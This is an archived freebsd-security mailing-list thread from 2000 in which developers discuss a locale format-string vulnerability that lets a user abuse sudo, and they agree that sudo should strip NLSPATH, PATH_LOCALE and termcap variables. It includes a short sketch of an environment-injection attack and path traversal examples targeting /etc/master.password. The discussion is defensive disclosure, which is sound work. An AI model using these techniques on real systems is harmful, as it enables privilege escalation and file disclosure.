majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:33:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id C2ECE37B422; Thu, 7 Sep 2000 14:33:09 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA39071; Thu, 7 Sep 2000 15:33:06 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA06187; Thu, 7 Sep 2000 15:32:56 -0600 (MDT) Message-Id: <200009072132.PAA06187@harmony.village.org> To: "Todd C. Miller" Subject: Re: UNIX locale format string vulnerability (fwd) Cc: Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 15:26:56 MDT." <200009072126.e87LQuE12710@xerxes.courtesan.com> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> Date: Thu, 07 Sep 2000 15:32:56 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200009072126.e87LQuE12710@xerxes.courtesan.com> "Todd C. Miller" writes: : In message : so spake Kris Kennaway (kris): : : > Again, the problem here is with sudo, not with something that comes in : > FreeBSD. : : How is this a sudo problem? Do you expect sudo to strip away the NLS : env vars for you? This would not be unprecedented, as sudo already : strips out LD_* and friends but breaking locales seems a bit dodgy. : : As I haven't seen the entire thread I'm clearly missing some info... That's why I asked for more specific details... So far I've not seen any. He's basically worried that someone could use the LC_* variables to exploit bugs in the locale code's lack of checking of %n arguments. eg setenv LOCALE_PATH /my/evil/stuff setenv LC_LANG "my_Evil" sudo ls It seems like a longshot to me, or I misunderstand something. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:36:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 754A937B42C; Thu, 7 Sep 2000 14:36:39 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87La0919181; Fri, 8 Sep 2000 01:36:00 +0400 (MSD) (envelope-from ache) Date: Fri, 8 Sep 2000 01:35:57 +0400 From: "Andrey A. Chernov" To: Warner Losh Cc: "Todd C. Miller" , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000908013556.A19114@nagual.pp.ru> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009072132.PAA06187@harmony.village.org>; from imp@village.org on Thu, Sep 07, 2000 at 03:32:56PM -0600 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 07, 2000 at 03:32:56PM -0600, Warner Losh wrote: > : How is this a sudo problem? Do you expect sudo to strip away the NLS > : env vars for you? This would not be unprecedented, as sudo already > : strips out LD_* and friends but breaking locales seems a bit dodgy. > : > : As I haven't seen the entire thread I'm clearly missing some info... > > That's why I asked for more specific details... So far I've not seen > any. > > He's basically worried that someone could use the LC_* variables to > exploit bugs in the locale code's lack of checking of %n arguments. 'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other actions required. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:39:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 48AC337B422; Thu, 7 Sep 2000 14:39:30 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA16649; Thu, 7 Sep 2000 14:39:30 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 14:39:30 -0700 (PDT) From: Kris Kennaway To: "Todd C. Miller" Cc: Warner Losh , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072126.e87LQuE12710@xerxes.courtesan.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Todd C. Miller wrote: > In message > so spake Kris Kennaway (kris): > > > Again, the problem here is with sudo, not with something that comes in > > FreeBSD. > > How is this a sudo problem? Do you expect sudo to strip away the NLS > env vars for you? This would not be unprecedented, as sudo already > strips out LD_* and friends but breaking locales seems a bit dodgy. > > As I haven't seen the entire thread I'm clearly missing some info... Non-setuid applications which use PATH_LOCALE (which isn't restricted by libc since the application being run isn't setuid) can be pointed to a user-supplied locale file, which might contain nasty strings like formatting operators which could exploit a binary which doesnt handle them properly. The net result is the user who has authority to sudo to a user and run a non-privileged app can also run other code as that user. Basically sudo is being used as a "poor man's setuid" which bypasses the libc checks which would be in place to ignore the env variables if the binary itself were setuid, so those checks need to be pushed down into sudo itself. The second problem is that a non-privileged app which can be told to get its locale functions from an arbitrary dir (either using PATH_LOCALE, or using ../../../ constructs in some variable which is used to construct a path (which should probably be disallowed by libc anyway)) might be able to read bits of files as the user being sudo'ed to. Now, I haven't fully explored to what extent this is possible on FreeBSD - I believe the first one is a problem if sudo is used on third party applications, but I'm not sure if the second one is, i.e. whether we disallow use of '/' in the appropriate locale variables. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:40:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id CB0CC37B42C; Thu, 7 Sep 2000 14:40:31 -0700 (PDT) Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87Le3715994; Thu, 7 Sep 2000 15:40:03 -0600 (MDT) Message-Id: <200009072140.e87Le3715994@xerxes.courtesan.com> To: "Andrey A. Chernov" Cc: Warner Losh , "Todd C. Miller" , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Fri, 08 Sep 2000 01:35:57 +0400." <20000908013556.A19114@nagual.pp.ru> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> Date: Thu, 07 Sep 2000 15:40:03 -0600 From: "Todd C. Miller" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000908013556.A19114@nagual.pp.ru> so spake "Andrey A. Chernov" (ache): > 'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other > actions required. That seems pretty reasonable. I'll strip those out of the environment in sudo 1.6.4. - todd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:43:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id D6A2637B424 for ; Thu, 7 Sep 2000 14:43:17 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id XAA01127; Thu, 7 Sep 2000 23:42:44 +0200 (MET DST) Date: Thu, 7 Sep 2000 23:42:44 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: Warner Losh Cc: freebsd-security@FreeBSD.ORG, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072059.OAA05785@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message "Vladimir Mencl, MK, susSED" writes: > : The point is, that if I submitted an evil locale - especially, a locale > : containing formatting strings with "%n"s, and generally with a lot of > : weird formatting characters, I could potentially make that sudo-run > : program execute arbitrary code provided by me - that's what the original > : bugtraq advisory was about, and what I claim that with sudo can be > : exploited on FreeBSD too. > > Ah. I see your point. This is a generic problem then. However, it > is a problem with sudo (which is why I keep adding millert back to the > list of CC'd people). It likely isn't a big problem for reasons I > explained earlier. sudo isn't inteded to be a bulletproof way to give > users the ability to execute N listed commands, as many of those may > have sub commands. Todd can take a stand on this more accuragely. I had always considered sudo such a tool. Unless you explicitely allow variable command-line for the commands executed, only the exact arguments specified on the command-line in the sudoers file may be passed. With respect to the two most recent posts: 1) Yes, I'm worried about exploits using %n. That's what the original bugtraq post was worried about 2) Yes, the solution is that sudo must strip the NLS variables. Vladimir Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:45: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E983D37B422; Thu, 7 Sep 2000 14:45:01 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA39175; Thu, 7 Sep 2000 15:44:58 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA06367; Thu, 7 Sep 2000 15:44:48 -0600 (MDT) Message-Id: <200009072144.PAA06367@harmony.village.org> To: Kris Kennaway Subject: Re: UNIX locale format string vulnerability (fwd) Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 14:39:30 PDT." References: Date: Thu, 07 Sep 2000 15:44:48 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : Now, I haven't fully explored to what extent this is possible on FreeBSD - : I believe the first one is a problem if sudo is used on third party : applications, but I'm not sure if the second one is, i.e. whether we : disallow use of '/' in the appropriate locale variables. We already disallow this. You can't set your lang to be ../../../../../../etc/master.password, for example. If the LANG variable has / in it, it is ignored. I think that the only one that needs this restriction. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:47:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 3AA8337B422; Thu, 7 Sep 2000 14:47:29 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87Lknw19285; Fri, 8 Sep 2000 01:46:49 +0400 (MSD) (envelope-from ache) Date: Fri, 8 Sep 2000 01:46:47 +0400 From: "Andrey A. Chernov" To: "Todd C. Miller" Cc: Warner Losh , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000908014646.A19231@nagual.pp.ru> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009072140.e87Le3715994@xerxes.courtesan.com>; from Todd.Miller@courtesan.com on Thu, Sep 07, 2000 at 03:40:03PM -0600 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 07, 2000 at 03:40:03PM -0600, Todd C. Miller wrote: > In message <20000908013556.A19114@nagual.pp.ru> > so spake "Andrey A. Chernov" (ache): > > > 'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other > > actions required. > > That seems pretty reasonable. I'll strip those out of the environment > in sudo 1.6.4. Speaking outside of locale/nls area, 'sudo' *must* internally setenv TERMCAP /usr/share/misc/termcap too, for the same reasons. Grep 'issetugid' through libraries is your friend. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:50:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 341D937B422; Thu, 7 Sep 2000 14:50:45 -0700 (PDT) Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87LoDm26973; Thu, 7 Sep 2000 15:50:13 -0600 (MDT) Message-Id: <200009072150.e87LoDm26973@xerxes.courtesan.com> To: "Andrey A. Chernov" Cc: "Todd C. Miller" , Warner Losh , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Fri, 08 Sep 2000 01:46:47 +0400." <20000908014646.A19231@nagual.pp.ru> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> Date: Thu, 07 Sep 2000 15:50:13 -0600 From: "Todd C. Miller" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000908014646.A19231@nagual.pp.ru> so spake "Andrey A. Chernov" (ache): > Speaking outside of locale/nls area, 'sudo' *must* internally > setenv TERMCAP /usr/share/misc/termcap > too, for the same reasons. Grep 'issetugid' through libraries is your > friend. That's way too platform specific; clearing TERMCAP (as well as TERMPATH and TERMINFO) if it begins with a '/' would make more sense. - todd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:52:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8662C37B424; Thu, 7 Sep 2000 14:52:46 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA39241; Thu, 7 Sep 2000 15:52:45 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA06531; Thu, 7 Sep 2000 15:52:35 -0600 (MDT) Message-Id: <200009072152.PAA06531@harmony.village.org> To: "Todd C. Miller" Subject: Re: UNIX locale format string vulnerability (fwd) Cc: "Andrey A. Chernov" , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG In-reply-to: Your message of "Thu, 07 Sep 2000 15:50:13 MDT." <200009072150.e87LoDm26973@xerxes.courtesan.com> References: <200009072150.e87LoDm26973@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> Date: Thu, 07 Sep 2000 15:52:35 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200009072150.e87LoDm26973@xerxes.courtesan.com> "Todd C. Miller" writes: : In message <20000908014646.A19231@nagual.pp.ru> : so spake "Andrey A. Chernov" (ache): : : > Speaking outside of locale/nls area, 'sudo' *must* internally : > setenv TERMCAP /usr/share/misc/termcap : > too, for the same reasons. Grep 'issetugid' through libraries is your : > friend. : : That's way too platform specific; clearing TERMCAP (as well as : TERMPATH and TERMINFO) if it begins with a '/' would make more sense. If it has a '/' in it, don't you mean? "../../../../../../../../../../../home/imp/bad-thing" is effectively an absolute path. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:57:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 2EA4D37B423; Thu, 7 Sep 2000 14:57:24 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87LuaZ19378; Fri, 8 Sep 2000 01:56:36 +0400 (MSD) (envelope-from ache) Date: Fri, 8 Sep 2000 01:56:34 +0400 From: "Andrey A. Chernov" To: "Todd C. Miller" Cc: Warner Losh , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000908015631.A19316@nagual.pp.ru> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072150.e87LoDm26973@xerxes.courtesan.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009072150.e87LoDm26973@xerxes.courtesan.com>; from Todd.Miller@courtesan.com on Thu, Sep 07, 2000 at 03:50:13PM -0600 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 07, 2000 at 03:50:13PM -0600, Todd C. Miller wrote: > In message <20000908014646.A19231@nagual.pp.ru> > so spake "Andrey A. Chernov" (ache): > > > Speaking outside of locale/nls area, 'sudo' *must* internally > > setenv TERMCAP /usr/share/misc/termcap > > too, for the same reasons. Grep 'issetugid' through libraries is your > > friend. > > That's way too platform specific; clearing TERMCAP (as well as > TERMPATH and TERMINFO) if it begins with a '/' would make more sense. Clearing all (or resetting TERMCAP as I suggest) must be done in any case, not only if it begins with '/'. The reason is simple - intruder can supply bad entry (%-infected) directly in the TERMCAP variable. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:59:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 2403D37B422; Thu, 7 Sep 2000 14:59:53 -0700 (PDT) Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87LxO816950; Thu, 7 Sep 2000 15:59:24 -0600 (MDT) Message-Id: <200009072159.e87LxO816950@xerxes.courtesan.com> To: Warner Losh Cc: "Todd C. Miller" , "Andrey A. Chernov" , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Thu, 07 Sep 2000 15:52:35 MDT." <200009072152.PAA06531@harmony.village.org> References: <200009072150.e87LoDm26973@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072152.PAA06531@harmony.village.org> Date: Thu, 07 Sep 2000 15:59:24 -0600 From: "Todd C. Miller" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200009072152.PAA06531@harmony.village.org> so spake Warner Losh (imp): > If it has a '/' in it, don't you mean? > "../../../../../../../../../../../home/imp/bad-thing" is effectively > an absolute path. No, neither the BSD libtermcap nor ncurses follow relative paths. This makes sense since there's no reason why '/' wouldn't be valid in a termcap entry which TERMCAP can contain. The TERMPATH and TERMINFO variables are different in that they only contains pathnames and so can be stripped out with extreme prejudice ;-) - todd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15: 4:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 93AC637B422; Thu, 7 Sep 2000 15:04:05 -0700 (PDT) Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87M2su28507; Thu, 7 Sep 2000 16:02:54 -0600 (MDT) Message-Id: <200009072202.e87M2su28507@xerxes.courtesan.com> To: "Andrey A. Chernov" Cc: "Todd C. Miller" , Warner Losh , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Fri, 08 Sep 2000 01:56:34 +0400." <20000908015631.A19316@nagual.pp.ru> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072150.e87LoDm26973@xerxes.courtesan.com> <20000908015631.A19316@nagual.pp.ru> Date: Thu, 07 Sep 2000 16:02:54 -0600 From: "Todd C. Miller" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000908015631.A19316@nagual.pp.ru> so spake "Andrey A. Chernov" (ache): > Clearing all (or resetting TERMCAP as I suggest) must be done in any case, > not only if it begins with '/'. The reason is simple - intruder can supply > bad entry (%-infected) directly in the TERMCAP variable. Sorry, I don't buy it. '%' is a perfectly fine (and common) thing to find in a termcap entry. If you have code that behaves poorly only termcap entries with '%' in them you've got serious problems... - todd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:13:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 3872C37B422; Thu, 7 Sep 2000 15:13:43 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id AAA01306; Fri, 8 Sep 2000 00:13:22 +0200 (MET DST) Date: Fri, 8 Sep 2000 00:13:21 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: "Andrey A. Chernov" Cc: "Todd C. Miller" , Warner Losh , Kris Kennaway , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <20000908014646.A19231@nagual.pp.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 8 Sep 2000, Andrey A. Chernov wrote: > On Thu, Sep 07, 2000 at 03:40:03PM -0600, Todd C. Miller wrote: > > In message <20000908013556.A19114@nagual.pp.ru> > > so spake "Andrey A. Chernov" (ache): > > > > > 'sudo' port *must* strip NLSPATH and PATH_LOCALE variables. No other > > > actions required. > > > > That seems pretty reasonable. I'll strip those out of the environment > > in sudo 1.6.4. > > Speaking outside of locale/nls area, 'sudo' *must* internally > setenv TERMCAP /usr/share/misc/termcap > too, for the same reasons. Grep 'issetugid' through libraries is your > friend. Yeah, that was a really interesting search: vlada@dual:/ftp/pub/FreeBSD/branches/-current/src/lib$find . -name \*.c | xargs grep issetugid ./libc/db/btree/bt_open.c: if (issetugid() == 0) ./libc/gen/glob.c: issetugid() != 0 || ./libc/locale/setlocale.c: && !issetugid() ./libc/locale/setrunelocale.c: && !issetugid() ./libc/net/res_init.c: if (issetugid() == 0 && (cp = getenv("LOCALDOMAIN")) != NULL) { ./libc/net/res_init.c: if (issetugid()) ./libc/net/res_query.c: if (issetugid()) ./libc/nls/msgcat.c: || issetugid() ./libc/stdio/tempnam.c: if (issetugid() == 0 && (f = getenv("TMPDIR"))) { ./libc/stdtime/localtime.c: if (name != NULL && issetugid() != 0) ./libedit/el.c: if (issetugid() == 0 && (tty = getenv("DEBUGTTY")) != NULL) { ./libedit/el.c: if (issetugid() != 0 || (ptr = getenv("HOME")) == NULL) ./libncurses/termcap.c: if (issetugid()) What I see immediately: locales, and message catalogs, we already know about them. file globbing ... HOME is ignored, home from the passwd entry is used the resolver - env vars LOCALDOMAIN, RES_OPTIONS, HOSTALIASES tempnam.c : ? even the TMPDIR ? DEBUGTTY ? termcap the btree code is also concerned about the TMPDIR - when setugid, ignore it, and use /tmp Yeah, it looks like that sudo & friends should be discarding all environment discarded anywhere after a issetugid. Looks like this is all - for the base system. Maybe, there should be a system-wide list of env vars not to be passed to programs running with elevated privileges.... The problem is rather generic, the cause is that a setugid program executes another program at the elevated privilege level, but does not transfer the "issetugid" flag. IMHO. Vladimir Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:16:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id BD13937B42C; Thu, 7 Sep 2000 15:16:25 -0700 (PDT) Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87MFtQ24652; Thu, 7 Sep 2000 16:15:55 -0600 (MDT) Message-Id: <200009072215.e87MFtQ24652@xerxes.courtesan.com> To: "Vladimir Mencl, MK, susSED" Cc: "Andrey A. Chernov" , "Todd C. Miller" , Warner Losh , Kris Kennaway , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Fri, 08 Sep 2000 00:13:21 +0200." References: Date: Thu, 07 Sep 2000 16:15:55 -0600 From: "Todd C. Miller" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sudo already discards the following: IFS LOCALDOMAIN RES_OPTIONS HOSTALIASES LD_* _RLD* SHLIB_PATH LIBPATH KRB_CONF KRB5_CONFIG ENV BASH_ENV - todd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:20:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B9CF37B43F; Thu, 7 Sep 2000 15:20:09 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA24042; Thu, 7 Sep 2000 15:20:09 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:20:08 -0700 (PDT) From: Kris Kennaway To: "Todd C. Miller" Cc: "Vladimir Mencl, MK, susSED" , "Andrey A. Chernov" , Warner Losh , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072215.e87MFtQ24652@xerxes.courtesan.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Todd C. Miller wrote: > Sudo already discards the following: This is taking the wrong approach. You can't hope to guess all of the "magic" environment variables which have special meaning on all platforms on which sudo may run and implement parallel restrictions in sudo. For (a somewhat contrived) example, under Foonix, libc might read a variable BREAK_TO_EDITOR_ON_EXEC which is ignored when 